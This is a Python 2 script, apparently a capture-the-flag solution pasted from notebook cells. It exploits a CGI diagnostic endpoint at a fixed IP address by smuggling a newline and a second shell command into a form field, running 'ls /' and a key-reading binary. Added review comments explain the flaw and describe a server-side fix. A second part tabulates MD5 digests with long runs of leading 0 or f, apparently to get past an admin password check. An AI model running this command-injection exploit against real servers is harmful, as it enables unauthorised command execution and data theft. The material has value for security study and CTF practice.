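# Python 2 script (print statement, str.decode("base64")), apparently pasted
# from IPython notebook cells; statements are kept in their original order.
import requests
from hashlib import md5

# ---------------------------------------------------------------------------
# Part 1: command execution through the "curl" diagnostic action
#
# The form field `arg` carries a newline followed by a second command line.
# The response is then read from the "xxx" marker onwards; -w is curl's
# write-out option, so the marker is printed by curl itself and whatever
# follows it is the output of the line after the newline.
#
# NOTE(review): this implies the CGI splices `arg` into a shell command line
# without rejecting control characters -- confirm against the handler. The
# server-side fix is to run the tool with an argv list (no shell), reject
# CR/LF and other control characters in the field, and allowlist the options
# the diagnostic is permitted to use.
# NOTE(review): the request goes out with an empty `sechash` and an arbitrary
# `diagsess` cookie. If the endpoint serves it, the session check is not
# enforced for this action -- verify on the server side.
# ---------------------------------------------------------------------------
URL = "http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash="

headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {"diagsess": "../etc/passwd"}  # doesn't matter

cmd = " ls /"
payload = {"action": "curl", "arg": "aaa -w xxx\n" + cmd}
r = requests.post(URL, data=payload, cookies=cookies, headers=headers)
# find() returns -1 when the marker is absent; the slice then starts at
# offset 3 and the printed text is not command output.
print r.content[r.content.find(">xxx")+4:]

cmd = "/read_key /key.txt"
# or use python to read stderr
# cmd = "python -c s=__import__('subprocess');print(s.check_output('/read_key'+chr(32)+'/key.txt',stderr=s.STDOUT,shell=True))"
payload = {"action": "curl", "arg": "aaa -w xxx\n" + cmd}
r = requests.post(URL, data=payload, cookies=cookies, headers=headers)
print r.content[r.content.find(">xxx")+4:]


# ---------------------------------------------------------------------------
# Part 2: BTW, attempts to find an admin password
#
# Lists candidate strings next to their MD5 digests, sorted by digest, with
# the length of the run of identical leading hex digits. How these digests
# relate to the admin password check is not shown in this file.
# ---------------------------------------------------------------------------

# from http://calebmadrigal.com/display-list-as-table-in-ipython-notebook/
class ListTable(list):
    """ Overridden list class which takes a 2-dimensional list of
        the form [[1,2,3],[4,5,6]], and renders an HTML Table in
        IPython Notebook. """

    def _repr_html_(self):
        # One <tr> per inner list, one <td> per element. Cell values are
        # inserted without HTML escaping, so only feed this trusted or
        # already-escaped text (the table below passes repr() of each
        # plaintext).
        html = ["<table>"]
        for row in self:
            html.append("<tr>")
            html.extend("<td>{0}</td>".format(col) for col in row)
            html.append("</tr>")
        html.append("</table>")
        return ''.join(html)


# Candidate inputs; three of them are kept base64-encoded in the source and
# decoded to raw bytes here.
L = [
    "djGFYmi",
    "ZkjAFaaaa",
    "G/I2/vILur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
    "Vf3ppC4Iu74AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
    "6Za/F6+mur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA= ".decode("base64"),
    'Kdr.b4v',
    'K1UgX15KGWDJKTdo',
    'xIoN=JG',
    'http://weijr-eng.blogspot.com GE\x00\x00\x0f\xe5\xef\x0b',
]
L += [
    'b81.org/kpoz&AV',
    'b81.org/GD9FD&Sa',
    'b81.org/S27Mp1Ya',
    'http://weijr-eng.blogspot.com \xbf\x13\x00\x00\xbd\xae\xcb`',
]
L += [
    'http://weijr-eng.blogspot.com \xcb<\x00\x00\xf9\xc8P\xd4',
    'http://weijr-eng.blogspot.com \x97\xa1\x00\x00T3z\x0c',
]

# (digest, plaintext) pairs ordered by hex digest.
S = sorted((md5(x).hexdigest(), x) for x in L)

# First column: index of the first position where two adjacent hex digits
# differ, plus one -- i.e. how many identical digits the digest starts with.
# As a bare expression this only renders when it is the last statement of a
# notebook cell; run as a plain script it has no visible effect.
ListTable(
    [['Leading 0 or f', 'md5 hexdigest', 'plaintext']] +
    [[[i for i in range(len(s[0])-1) if s[0][i] != s[0][i+1]][0] + 1,
      s[0],
      repr(s[1])] for s in S]
)

# Save two of the candidates to files for later use.
# NOTE(review): presumably the entries with the lowest and highest digest in
# the table above -- confirm against the rendered output.
with open('md5low', 'w') as f:
    f.write('http://weijr-eng.blogspot.com \xcb<\x00\x00\xf9\xc8P\xd4')
with open('md5high', 'w') as f:
    f.write('http://weijr-eng.blogspot.com \x97\xa1\x00\x00T3z\x0c')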